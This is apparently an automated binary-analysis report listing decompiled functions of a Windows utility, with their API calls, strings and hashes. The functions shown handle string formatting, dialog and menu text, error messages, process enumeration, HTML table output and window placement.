                                                                                                        Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 79%
                                                                                                        			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                        0x00405241
                                                                                                        0x00405250
                                                                                                        0x00405257
                                                                                                        0x0040525f
                                                                                                        0x00405262
                                                                                                        0x00405265
                                                                                                        0x00405268
                                                                                                        0x0040526f
                                                                                                        0x0040526f
                                                                                                        0x00405277
                                                                                                        0x00405277
                                                                                                        0x0040527a
                                                                                                        0x0040527f
                                                                                                        0x00405284
                                                                                                        0x00405285
                                                                                                        0x00405291
                                                                                                        0x00405296
                                                                                                        0x004052a9
                                                                                                        0x004052b3
                                                                                                        0x004052b7
                                                                                                        0x004052bc
                                                                                                        0x004052ca
                                                                                                        0x004052d2
                                                                                                        0x004052d5
                                                                                                        0x004052d8
                                                                                                        0x004052d8
                                                                                                        0x004052db
                                                                                                        0x004052db
                                                                                                        0x004052e1
                                                                                                        0x004052e4
                                                                                                        0x004052e8
                                                                                                        0x004052f2

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memcpywcslen$_snwprintfmemset
                                                                                                        • String ID: %s (%s)
                                                                                                        • API String ID: 3979103747-1363028141
                                                                                                        • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                        • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                        • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                        • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                        0x00406157
                                                                                                        0x0040616d
                                                                                                        0x00406174
                                                                                                        0x0040617f
                                                                                                        0x00406185
                                                                                                        0x00406196
                                                                                                        0x0040619e
                                                                                                        0x004061b6
                                                                                                        0x004061bd
                                                                                                        0x004061d4
                                                                                                        0x004061da
                                                                                                        0x004061e0
                                                                                                        0x004061e5
                                                                                                        0x004061e6
                                                                                                        0x004061ef
                                                                                                        0x004061f9
                                                                                                        0x004061ff
                                                                                                        0x004061ef
                                                                                                        0x00406206

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                        • String ID: sysdatetimepick32
                                                                                                        • API String ID: 1028950076-4169760276
                                                                                                        • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                        • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                        • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                        • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 68%
                                                                                                        			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                        0x00404706
                                                                                                        0x00404714
                                                                                                        0x0040471c
                                                                                                        0x00404721
                                                                                                        0x0040472b
                                                                                                        0x00404733
                                                                                                        0x00404735
                                                                                                        0x00404735
                                                                                                        0x00404733
                                                                                                        0x00404751
                                                                                                        0x00404780
                                                                                                        0x00404753
                                                                                                        0x0040475e
                                                                                                        0x00404766
                                                                                                        0x0040476c
                                                                                                        0x00404770
                                                                                                        0x00404770
                                                                                                        0x0040478a

                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                        • wcslen.MSVCRT ref: 00404756
                                                                                                        • wcscpy.MSVCRT ref: 00404766
                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                        • wcscpy.MSVCRT ref: 00404780
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                        • String ID: netmsg.dll
                                                                                                        • API String ID: 2767993716-3706735626
                                                                                                        • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                        • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                        • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                        • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                                        0x0040598b
                                                                                                        0x0040598b
                                                                                                        0x0040599a
                                                                                                        0x004059ae
                                                                                                        0x004059b5
                                                                                                        0x004059c1
                                                                                                        0x004059c6
                                                                                                        0x004059cb
                                                                                                        0x004059ce
                                                                                                        0x00405a7b
                                                                                                        0x00405a7b
                                                                                                        0x004059d4
                                                                                                        0x004059d4
                                                                                                        0x004059dc
                                                                                                        0x004059ee
                                                                                                        0x00000000
                                                                                                        0x004059f0
                                                                                                        0x004059f0
                                                                                                        0x004059f6
                                                                                                        0x004059f7
                                                                                                        0x004059fa
                                                                                                        0x00405a03
                                                                                                        0x00405a2b
                                                                                                        0x00405a2e
                                                                                                        0x00405a3c
                                                                                                        0x00405a40
                                                                                                        0x00000000
                                                                                                        0x00405a42
                                                                                                        0x00405a42
                                                                                                        0x00405a54
                                                                                                        0x00405a59
                                                                                                        0x00405a5a
                                                                                                        0x00405a5a
                                                                                                        0x00405a61
                                                                                                        0x00405a69
                                                                                                        0x00405a7f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405a69
                                                                                                        0x00405a05
                                                                                                        0x00405a0e
                                                                                                        0x00405a17
                                                                                                        0x00000000
                                                                                                        0x00405a19
                                                                                                        0x00405a19
                                                                                                        0x00405a1c
                                                                                                        0x00405a1d
                                                                                                        0x00405a20
                                                                                                        0x00405a29
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405a29
                                                                                                        0x00405a17
                                                                                                        0x00405a03
                                                                                                        0x00000000
                                                                                                        0x00405a6b
                                                                                                        0x00405a6e
                                                                                                        0x00405a72
                                                                                                        0x00405a72
                                                                                                        0x00000000
                                                                                                        0x004059d4
                                                                                                        0x00405a81
                                                                                                        0x00405a84
                                                                                                        0x00405a8f

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004059B5
                                                                                                          • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                          • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                          • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                          • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                          • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                          • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                          • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                          • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                          • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                          • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                          • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                          • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                        • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                        • wcschr.MSVCRT ref: 00405A0E
                                                                                                        • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                        • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                        • String ID:
                                                                                                        • API String ID: 768606695-0
                                                                                                        • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                        • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                        • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                        • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 64%
                                                                                                        			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                                        0x00407639
                                                                                                        0x00407646
                                                                                                        0x00407647
                                                                                                        0x00407654
                                                                                                        0x0040765f
                                                                                                        0x0040765f
                                                                                                        0x0040766b
                                                                                                        0x0040766d
                                                                                                        0x00407672
                                                                                                        0x00407677
                                                                                                        0x0040767d
                                                                                                        0x00407680
                                                                                                        0x00407686
                                                                                                        0x00407691
                                                                                                        0x00407697
                                                                                                        0x00407699
                                                                                                        0x00407699
                                                                                                        0x0040769c
                                                                                                        0x0040769f
                                                                                                        0x004076a3
                                                                                                        0x004076a7
                                                                                                        0x004076ab
                                                                                                        0x004076b5
                                                                                                        0x004076be
                                                                                                        0x004076c8
                                                                                                        0x004076de
                                                                                                        0x004076ee
                                                                                                        0x004076f1
                                                                                                        0x004076f4
                                                                                                        0x004076fa
                                                                                                        0x00407708
                                                                                                        0x0040770e
                                                                                                        0x00407718
                                                                                                        0x0040771d
                                                                                                        0x00407723
                                                                                                        0x00407724
                                                                                                        0x00407727
                                                                                                        0x0040772c
                                                                                                        0x0040772f
                                                                                                        0x00407734
                                                                                                        0x0040773f
                                                                                                        0x00407744
                                                                                                        0x00407745
                                                                                                        0x0040767d
                                                                                                        0x00407760

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintfwcscat
                                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                        • API String ID: 384018552-4153097237
                                                                                                        • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                        • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                        • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                        • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 42%
                                                                                                        			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                        0x0040605e
                                                                                                        0x00406061
                                                                                                        0x00406069
                                                                                                        0x00406074
                                                                                                        0x0040607a
                                                                                                        0x0040607e
                                                                                                        0x00406082
                                                                                                        0x00406148
                                                                                                        0x0040614e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406088
                                                                                                        0x00406088
                                                                                                        0x00406093
                                                                                                        0x00406098
                                                                                                        0x0040609f
                                                                                                        0x004060ae
                                                                                                        0x004060b6
                                                                                                        0x004060be
                                                                                                        0x004060c6
                                                                                                        0x004060ca
                                                                                                        0x004060cf
                                                                                                        0x004060d7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060de
                                                                                                        0x00406129
                                                                                                        0x00406129
                                                                                                        0x0040612d
                                                                                                        0x0040612f
                                                                                                        0x00406130
                                                                                                        0x00406134
                                                                                                        0x00406137
                                                                                                        0x0040613c
                                                                                                        0x0040613c
                                                                                                        0x00000000
                                                                                                        0x0040612d
                                                                                                        0x004060e7
                                                                                                        0x004060f0
                                                                                                        0x004060f2
                                                                                                        0x004060f2
                                                                                                        0x004060f9
                                                                                                        0x004060fd
                                                                                                        0x00406102
                                                                                                        0x0040610c
                                                                                                        0x00406112
                                                                                                        0x00406117
                                                                                                        0x00406117
                                                                                                        0x00406104
                                                                                                        0x00406104
                                                                                                        0x00406104
                                                                                                        0x00406104
                                                                                                        0x00406102
                                                                                                        0x00406122
                                                                                                        0x00406128
                                                                                                        0x00000000
                                                                                                        0x0040613f
                                                                                                        0x0040613f
                                                                                                        0x00406140
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                        • String ID: 0$6
                                                                                                        • API String ID: 2029023288-3849865405
                                                                                                        • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                        • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                        • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                        • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                                        0x00402bee
                                                                                                        0x00402bf8
                                                                                                        0x00402cae
                                                                                                        0x00402c08
                                                                                                        0x00402c10
                                                                                                        0x00402c11
                                                                                                        0x00402c12
                                                                                                        0x00402c13
                                                                                                        0x00402c20
                                                                                                        0x00402c27
                                                                                                        0x00402c2e
                                                                                                        0x00402c30
                                                                                                        0x00402c37
                                                                                                        0x00402c4b
                                                                                                        0x00402c50
                                                                                                        0x00402c53
                                                                                                        0x00402c55
                                                                                                        0x00402c3e
                                                                                                        0x00402c3e
                                                                                                        0x00402c41
                                                                                                        0x00402c41
                                                                                                        0x00402c5a
                                                                                                        0x00402c60
                                                                                                        0x00402c65
                                                                                                        0x00402c68
                                                                                                        0x00402c6d
                                                                                                        0x00402c77
                                                                                                        0x00402c7c
                                                                                                        0x00402c7e
                                                                                                        0x00402c87
                                                                                                        0x00402ca5
                                                                                                        0x00402ca5
                                                                                                        0x00402c87
                                                                                                        0x00402c7c
                                                                                                        0x00402c6d
                                                                                                        0x00000000
                                                                                                        0x00402cac

                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                        • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                        • GetSystemMetrics.USER32 ref: 00402C2A
